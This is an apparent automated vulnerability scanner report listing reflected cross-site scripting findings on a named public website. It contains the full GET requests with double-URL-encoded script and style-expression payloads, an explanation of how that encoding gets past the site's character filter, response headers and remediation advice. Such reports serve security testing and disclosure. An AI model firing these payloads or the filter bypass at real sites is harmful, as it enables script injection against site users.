HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=oc0z2245wuz2afzvjdfzixel; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321 was submitted in the REST URL parameter 1. This input was echoed as fc351"style="x:expression(alert(1))"46b2268b321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:59 GMT Content-Length: 8711 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=twmrveyjx5im0l30e30blh45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b was submitted in the REST URL parameter 1. This input was echoed as 68b35"style="x:expression(alert(1))"d2a8b1b996b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1y4wau550cpob2bb3amrf145; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc was submitted in the REST URL parameter 2. This input was echoed as f20b1"style="x:expression(alert(1))"35c6b1442fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training/x22f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:06 GMT Content-Length: 8767 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: ASP.NET_SessionId=b52255als5xnh545vc0uboia; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec was submitted in the REST URL parameter 2. This input was echoed as 5fc3f"style="x:expression(alert(1))"219d68a09ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training/5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:10 GMT Content-Length: 8746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=wufgse55k2kojwaw3jekff45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.79. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/training/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccf51"style="x:expression(alert(1))"a72e20bf002 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /training/x22?ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=fd1day3lcgnbupjb3jzkvr55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.80. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/training/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b27"style="x:expression(alert(1))"b6d7f14376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /training/x22?e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=4jdjcurlf30fkz4530xla555; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b was submitted in the REST URL parameter 3. This input was echoed as 579d3"><script>alert(1)</script>136f2be723b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b?id=340836/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:57 GMT Content-Length: 8928 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: ASP.NET_SessionId=fzzorg45tqhtbe455jbn02zs; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31 was submitted in the REST URL parameter 3. This input was echoed as 7ebb1"><script>alert(1)</script>7f63dfd6d31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/index.htm7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31?id=340836/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yawesm55knbvl4mobfmyjr2e; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8921 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa was submitted in the REST URL parameter 3. This input was echoed as d00fd"style="x:expression(alert(1))"37b4fa705aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=iffsvl2yty0fiq3algupkl55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 was submitted in the REST URL parameter 3. This input was echoed as 20ea8"style="x:expression(alert(1))"ea712677564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/index.htm20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ioghgr45ccy40ubwykcs3pan; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17 was submitted in the REST URL parameter 1. This input was echoed as 3f3f7"style="x:expression(alert(1))"704a7a40d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17/demo/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:51 GMT Content-Length: 8746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: ASP.NET_SessionId=wupmsxznbmovt155mvmvxh45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c was submitted in the REST URL parameter 1. This input was echoed as 81e6e"style="x:expression(alert(1))"30c796e241c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c/demo/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=vgiqbgv2pky1le45ukty4wfj; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8 was submitted in the REST URL parameter 2. This input was echoed as 5ca5b"style="x:expression(alert(1))"1a726fc0e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ygebeo553nhi5mztwrtyso45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a was submitted in the REST URL parameter 2. This input was echoed as 2addd"style="x:expression(alert(1))"108d415c1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ra0kk255lzz14izejoevse45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 was submitted in the REST URL parameter 3. This input was echoed as 551b7"style="x:expression(alert(1))"8d874867177 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/x22551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
